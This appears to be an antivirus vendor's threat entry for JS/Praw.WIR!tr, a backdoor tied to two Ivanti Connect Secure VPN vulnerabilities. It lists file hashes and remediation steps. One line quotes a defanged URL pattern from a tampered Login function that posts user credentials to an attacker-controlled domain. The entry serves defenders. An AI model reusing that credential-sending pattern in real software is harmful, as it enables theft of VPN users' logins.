JS/Praw.WIR!tr

Analysis

JS/Praw.WIR!tr is a generic detection for a backdoor trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:

• This malware is related to the exploitation of two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 targeting Ivanti Connect Secure VPN.
  
• Remote code execution (RCE) and unauthenticated command execution can be achieved upon successful exploitation.
  
• The "Login" function is modified to POST user credentials to the attacker-controlled domain. An example is shown below:
  
  • hxxps://[REMOVED].fr/IMG/xml.php?a=" + a +"&b="+ b+"&c="+c
• This malware has been associated with the following third party article/advisory.
  
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46805
  • https://nvd.nist.gov/vuln/detail/CVE-2024-21887/li>
    
• Following are some of the near/exact IOCs/file hash associated with this detection:
  
  • Md5: 2ec505088b942c234f39a37188e80d7a
    Sha256: d4de1b866f94cdc43e55fab932880da1f4e9c7406bb17926e30baa9b7b824ecb
  • Md5: e8489983d73ed30a4240a14b1f161254
    Sha256: e1d0ccfb7f1c46c7b8b8b154c97bac33f3ba89dae6481464cbe1448aca1e9dea

Recommended Action

• Make sure that your FortiGate/FortiClient system is using the latest AV database.
• Quarantine/delete files that are detected and replace infected files with clean backup copies.